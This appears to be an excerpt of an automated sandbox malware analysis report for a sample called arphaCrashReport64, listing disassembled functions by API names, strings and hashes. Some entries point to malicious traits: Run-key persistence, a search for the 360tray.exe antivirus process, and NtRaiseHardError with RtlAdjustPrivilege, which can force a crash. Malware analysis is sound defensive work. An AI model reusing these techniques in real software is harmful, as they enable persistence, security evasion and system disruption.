                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocateHeap_callnewh
                                            • String ID:
                                            • API String ID: 1390791636-0
                                            • Opcode ID: 439ca01c0b534294e515a0b1220c20a2ada1fbbfb490736fa7cba21e11b63feb
                                            • Instruction ID: fece6a039cbc2a31e456c80a87a59e5e3901b6687d1113cea4985755d6f8afca
                                            • Opcode Fuzzy Hash: 439ca01c0b534294e515a0b1220c20a2ada1fbbfb490736fa7cba21e11b63feb
                                            • Instruction Fuzzy Hash: F381D232B04FC086EB268F65D44835976EAF748BE8F564225EB5943BDCEB38C9418718
                                            Function 00007FFDFB8B6DD4 Relevance: 15.2, APIs: 10, Instructions: 177COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$Infofree$malloc
                                            • String ID:
                                            • API String ID: 1309074677-0
                                            • Opcode ID: 8a9f3679f922bc2bf2e641086cca12ee3bdbbecdfb0aecb55885090358858430
                                            • Instruction ID: eb5732affd5ae39b6d67304170244ccfb4c71926cb64579374fb132e69c84c6e
                                            • Opcode Fuzzy Hash: 8a9f3679f922bc2bf2e641086cca12ee3bdbbecdfb0aecb55885090358858430
                                            • Instruction Fuzzy Hash: 8F61D732B2974385EB209F359860979A6D1BBC47A4F148635EA6D47BFCDF3CE4418B80
                                            Function 00007FFDFB8B38FC Relevance: 15.1, APIs: 10, Instructions: 121COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLastfree
                                            • String ID:
                                            • API String ID: 994105223-0
                                            • Opcode ID: 649314e11dd046272e459de5e21085f2a0f873bd2fd29be637a3aa6bbb7b57ea
                                            • Instruction ID: 46083c120899203114d5d4f42a6865deae009204b21447c8694076d2d2e612ee
                                            • Opcode Fuzzy Hash: 649314e11dd046272e459de5e21085f2a0f873bd2fd29be637a3aa6bbb7b57ea
                                            • Instruction Fuzzy Hash: 86416022B2A74782EB649F31A5648396795FBC5BD0F149434C96E13BEDCE3CB491CB80
                                            Function 0000024B6458E280 Relevance: 15.1, APIs: 10, Instructions: 121synchronizationsleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: FreeVirtual$Event$CloseHandleObjectSingleSleepWait$Create$CancelCleanupResetStartupTimeclosesocketsetsockoptsockettime
                                            • String ID:
                                            • API String ID: 1609788701-0
                                            • Opcode ID: 5be1d2db3d2cf4a8f60e120e3a7be8c171a668c2326ee10cb714a65c25129b90
                                            • Instruction ID: 71a4e33f14a51fddefbbaf80daeb1457611ee17711be3c8bc0540741466666f5
                                            • Opcode Fuzzy Hash: 5be1d2db3d2cf4a8f60e120e3a7be8c171a668c2326ee10cb714a65c25129b90
                                            • Instruction Fuzzy Hash: 80516D32610E808AE722DF35E85839D77BAF7857A4F510216EB6D47BA8CF38C549CB44
                                            Function 0000024B6458F1D0 Relevance: 15.1, APIs: 10, Instructions: 62sleepprocessstringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: CloseHandle$ProcessProcess32$CreateFirstNextOpenSleepSnapshotTerminateToolhelp32lstrcmp
                                            • String ID:
                                            • API String ID: 3983807665-0
                                            • Opcode ID: 9a4ad9ec79557f838d5c850d1e15d38df011c5af4594aac11a6b4254f04b6826
                                            • Instruction ID: 4651b19d9bfe500e54e70c76e4a15655d57da39f0c702a067e7c7a58455d48cd
                                            • Opcode Fuzzy Hash: 9a4ad9ec79557f838d5c850d1e15d38df011c5af4594aac11a6b4254f04b6826
                                            • Instruction Fuzzy Hash: 46213135704E9086FA668B21EC5C36E73ABFB8CB94F464225D95A4679CDF3CC0498709
                                            Function 0000024B6459902C Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
                                            • String ID: @
                                            • API String ID: 3473179607-2766056989
                                            • Opcode ID: 4ef9daa8ef8e328afaa7914443f25a4f1d3113b308b25f51eb380e23cebb4cf6
                                            • Instruction ID: fb66fe019538d231e613ee875f4fbdae4d1fe2b6f7ad1bb115189caba3d98a9e
                                            • Opcode Fuzzy Hash: 4ef9daa8ef8e328afaa7914443f25a4f1d3113b308b25f51eb380e23cebb4cf6
                                            • Instruction Fuzzy Hash: 00816C62201FC18AEB5ACF29D94835D37AAF746B74F598329CA7A433D9DB38C455C308
                                            Function 0000024B64595128 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: DecodePointer$ExitProcess_amsg_exit_lock
                                            • String ID: ceil
                                            • API String ID: 3411037476-3069211559
                                            • Opcode ID: e2e3b51d05ac2f4ea72abadf658c529adedca980e58158798a595591db0a13ac
                                            • Instruction ID: ad21670d565f38dfb7329a35e26c2e355b98ab76409689149b7e135181aac693
                                            • Opcode Fuzzy Hash: e2e3b51d05ac2f4ea72abadf658c529adedca980e58158798a595591db0a13ac
                                            • Instruction Fuzzy Hash: BB419122216F8481FA569F11FC4C31D62AEF789B94F560026DB8D437ADEF78C4A9C309
                                            Function 0000024B64582AC0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 59stringprocessCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Process32$Nextlstrcmpi$CloseCreateFirstHandleSnapshotToolhelp32malloc
                                            • String ID: 360tray.exe
                                            • API String ID: 2114354-563812762
                                            • Opcode ID: 0a80cdac67bdaee33adcad855c3420713f87a426b057a216acdd1655a8540214
                                            • Instruction ID: b4a942e9e2442cf15f9e362f803db28db4944cb83741f9a166f2236a09156dc2
                                            • Opcode Fuzzy Hash: 0a80cdac67bdaee33adcad855c3420713f87a426b057a216acdd1655a8540214
                                            • Instruction Fuzzy Hash: CC218421715E5086FB469F22F85835A77AAF788F80F4A5022EE4A4779CDF38C589C708
                                            Function 00007FFDFB8B455C Relevance: 13.8, APIs: 11, Instructions: 90COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$ErrorFreeHeapLast_errno
                                            • String ID:
                                            • API String ID: 1012874770-0
                                            • Opcode ID: ec6fb349a9666d6148de3cae72c985ac2d52e64e79120cbf47aff892940f3c04
                                            • Instruction ID: a10f84c2b19e4e902afade0bc9d8d984098120d23023e7521fcdbe371d5161db
                                            • Opcode Fuzzy Hash: ec6fb349a9666d6148de3cae72c985ac2d52e64e79120cbf47aff892940f3c04
                                            • Instruction Fuzzy Hash: 2D41CC32B3B94384FF559B35C461BB82290AFC5B49F588435DA2D0B2E9CF6CE491CB91
                                            Function 00007FFDFB8B6038 Relevance: 13.7, APIs: 9, Instructions: 173COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$StringType$Infofree$ErrorLastmalloc
                                            • String ID:
                                            • API String ID: 3804003340-0
                                            • Opcode ID: 26459957d169a573dad3e4f19c6aa1708df1c6695df73bb3314daeed5864d62d
                                            • Instruction ID: d70ae032791a314fd20436a213cb4dc0334d4a5c5b53a470d13fb60349cf51cb
                                            • Opcode Fuzzy Hash: 26459957d169a573dad3e4f19c6aa1708df1c6695df73bb3314daeed5864d62d
                                            • Instruction Fuzzy Hash: 2361AA32B2964346EB609F35E850878B795FB847E8B148135DA3D577EDCE7CE8418B80
                                            Function 0000024B64582F20 Relevance: 13.6, APIs: 9, Instructions: 99threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Window$Text$ByteCharCurrentMultiProcessThreadWide$Internal
                                            • String ID:
                                            • API String ID: 3111847906-0
                                            • Opcode ID: 0fdf438269659fc0fa65afeff1c2bec110f1865e7b9a251698ba59ba194f47bd
                                            • Instruction ID: f8573b9232c85c26e6e69494d27883fe1e40ee7c7b47bcb0b172675c259cbe81
                                            • Opcode Fuzzy Hash: 0fdf438269659fc0fa65afeff1c2bec110f1865e7b9a251698ba59ba194f47bd
                                            • Instruction Fuzzy Hash: E631D472704F8086F7169B26B80821A669AF784BD4F594134EE9A47B9CDF3CC499C709
                                            Function 00007FFDFB8B2F98 Relevance: 13.6, APIs: 9, Instructions: 98COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: DecodePointer$_initterm$ExitProcess_lock
                                            • String ID:
                                            • API String ID: 2551688548-0
                                            • Opcode ID: 3f393191ff7132b82605170a0d68747c83baec95cf735867bc3b8e2c236a69ff
                                            • Instruction ID: 31e787bb1e12f894c57d5a2f076433e33765e12703f2cb6c15c485650e52b3a2
                                            • Opcode Fuzzy Hash: 3f393191ff7132b82605170a0d68747c83baec95cf735867bc3b8e2c236a69ff
                                            • Instruction Fuzzy Hash: 3D416A21B3B64380EB50AB25A8609797694FFC4784F048135EA6D037FEDF3CE4568B80
                                            Function 00007FFDFB8B5EC4 Relevance: 13.5, APIs: 7, Strings: 2, Instructions: 36COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$ErrorFreeHeapLast_errno
                                            • String ID: RegOpenKeyExW$eyExW
                                            • API String ID: 1012874770-580866691
                                            • Opcode ID: 42714ae5091cc8e33b7dd91adb6649ecb0b1f37723d2c6cbb2a3c539c6f1b40a
                                            • Instruction ID: ef971c5498478e9b09964bda81b5b544d7d8f88bfed31a725d5b2b9a6dd34896
                                            • Opcode Fuzzy Hash: 42714ae5091cc8e33b7dd91adb6649ecb0b1f37723d2c6cbb2a3c539c6f1b40a
                                            • Instruction Fuzzy Hash: FB019613F3A40395FB90EB71D472C781761AFC4745F588431D92E969FACE68F8808AE0
                                            Function 0000024B6458E723 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 31libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: NtRaiseHardError$RtlAdjustPrivilege$ntdll.dll
                                            • API String ID: 1646373207-3189222469
                                            • Opcode ID: ab13eb02454ac93fcd2d64e85cb7ad2ec888a7379b4bcbbceb6dd2d3d825901a
                                            • Instruction ID: 2808b447acb2782c9e0f1ccdb43661fe0535e67bb4058e02cb8467e87daa141b
                                            • Opcode Fuzzy Hash: ab13eb02454ac93fcd2d64e85cb7ad2ec888a7379b4bcbbceb6dd2d3d825901a
                                            • Instruction Fuzzy Hash: 0A014431610E4682EB12DBA5F85CA89B366FB887D8F451013DA4D07728DF3CC18DCB14
                                            Function 0000024B64591D10 Relevance: 12.1, APIs: 8, Instructions: 138memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 21959852741109b5e7747a37437c39210fff53e0e4c1cda0704ecbb69bd8df48
                                            • Instruction ID: 9ee31f55e99d28c6f3084cde883e5b32807481e84b5f65f529583ee3aed52a0e
                                            • Opcode Fuzzy Hash: 21959852741109b5e7747a37437c39210fff53e0e4c1cda0704ecbb69bd8df48
                                            • Instruction Fuzzy Hash: 21518D32311F9086FB56CB22E9487693BAAFB88BC4F094025DF4A07B58DF38D455C748
                                            Function 0000024B64599AB0 Relevance: 12.1, APIs: 8, Instructions: 59COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
                                            • String ID:
                                            • API String ID: 113790786-0
                                            • Opcode ID: 86b9dc4b091e1531f1f1660560b6c68a568f69c3ca3f9b6cc957dd92b27819b6
                                            • Instruction ID: aa0cca8a8b71cfb289a6a0b77bd40b0634b99b35995071c1cbe0b3f44089168c
                                            • Opcode Fuzzy Hash: 86b9dc4b091e1531f1f1660560b6c68a568f69c3ca3f9b6cc957dd92b27819b6
                                            • Instruction Fuzzy Hash: D6219021609EC4C6F667AB61E41C3AE625FEB84794F1A5124EB4A47BDECF3CC844835C
                                            Function 0000024B64598A90 Relevance: 12.0, APIs: 8, Instructions: 39COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno$AttributesErrorFileLast__doserrno_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2953107838-0
                                            • Opcode ID: f747f3ee9be4ded5c3729201c636670468750acdd607b39ec7231ba446a72a78
                                            • Instruction ID: 51758119d0e67a769c61853c9bb05c366b2eab4bf272323dbfecc33fc5b0ca9b
                                            • Opcode Fuzzy Hash: f747f3ee9be4ded5c3729201c636670468750acdd607b39ec7231ba446a72a78
                                            • Instruction Fuzzy Hash: 5E018160621EC4CBFF6B2FB4880E36D219F9F54321F475500D725422CFC738C884862A
                                            Function 0000024B642ABF88 Relevance: 11.6, APIs: 9, Instructions: 379COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: f32bca21d81294411377cb91f11f61de43356bc1920308245a35a8ea1693f131
                                            • Instruction ID: ab5fde9b4061565f9a35e301c854d3bb95c41ddce4f7cdd9a6756dfda3b4434e
                                            • Opcode Fuzzy Hash: f32bca21d81294411377cb91f11f61de43356bc1920308245a35a8ea1693f131
                                            • Instruction Fuzzy Hash: 1FD10A30628E448FDB5ADF69D0583A5B7D4FB58704F21016EE84AC728ADF34D889CB89
                                            Function 0000024B6459BFB0 Relevance: 10.8, APIs: 7, Instructions: 305COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 230abf8bd2d6fe58f199a5d982aed6ada3d7d01b665ea2997f38d06e056d1801
                                            • Instruction ID: c294a3353b81ca1290957ee77b19373b3ec31a1e3e94f345ffac73ba4590d001
                                            • Opcode Fuzzy Hash: 230abf8bd2d6fe58f199a5d982aed6ada3d7d01b665ea2997f38d06e056d1801
                                            • Instruction Fuzzy Hash: 67D19E32700F9099EB22DB62E488AEE77A9F789784F410526DF8D43799EF79C205C744
                                            Function 0000024B64590682 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 223registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: CloseOpenValuerand
                                            • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run$run
                                            • API String ID: 1269030272-4096352211
                                            • Opcode ID: bb5cf5929220f16a8c944caad1162cf4acaccbe0bc6527bf008da004e9084124
                                            • Instruction ID: 5eb9cd8ef2ee04668e4ecdec3f98839cb413ddefb469f7acd8c47c1c1424b57d
                                            • Opcode Fuzzy Hash: bb5cf5929220f16a8c944caad1162cf4acaccbe0bc6527bf008da004e9084124
                                            • Instruction Fuzzy Hash: 76B14B32211FC089EB769F34D8483D9236AF746798F414A16EB694BADECF74C294C348
                                            Function 00007FFDFB8B31A8 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetStartupInfoA.KERNEL32 ref: 00007FFDFB8B31CD
                                              • Part of subcall function 00007FFDFB8B2CD0: Sleep.KERNEL32(?,?,?,00007FFDFB8B29F3,?,?,?,00007FFDFB8B253D,?,?,?,?,00007FFDFB8B1ECD), ref: 00007FFDFB8B2D15
                                            • GetFileType.KERNEL32 ref: 00007FFDFB8B334A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: FileInfoSleepStartupType
                                            • String ID: @
                                            • API String ID: 1527402494-2766056989
                                            • Opcode ID: 48a193d817a4ce508542fbb661ae7cf82ef345bc93c222e0c3ee363ee47c5dd1
                                            • Instruction ID: 5c3d7e0ea241fe56ff152067657a527a12d2bb4507ddda6b14989263f34cf94a
                                            • Opcode Fuzzy Hash: 48a193d817a4ce508542fbb661ae7cf82ef345bc93c222e0c3ee363ee47c5dd1
                                            • Instruction Fuzzy Hash: 9A91A022B2968381E7158B34D468A292794FB85774F65C735C67D473E8DF3CE8428B81
                                            Function 0000024B64587CE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$mallocstd::exception::exception
                                            • String ID: bad locale name
                                            • API String ID: 4069110180-1405518554
                                            • Opcode ID: 95a9697bb6755bd2649860b9bd4432e613ca6325910d1b302bb7e252e0bbe095
                                            • Instruction ID: 062b3e2a173cc461da89b12baf8f90905cfe050916f6780d1cdcb4df721c066b
                                            • Opcode Fuzzy Hash: 95a9697bb6755bd2649860b9bd4432e613ca6325910d1b302bb7e252e0bbe095
                                            • Instruction Fuzzy Hash: 91515926B01F4099FB12EBB0E8693DD33ABAB44748F450426DF5917A9EDF34C459C388
                                            Function 0000024B642A395C Relevance: 10.6, APIs: 7, Instructions: 109COMMON
                                            Download Yara Rule
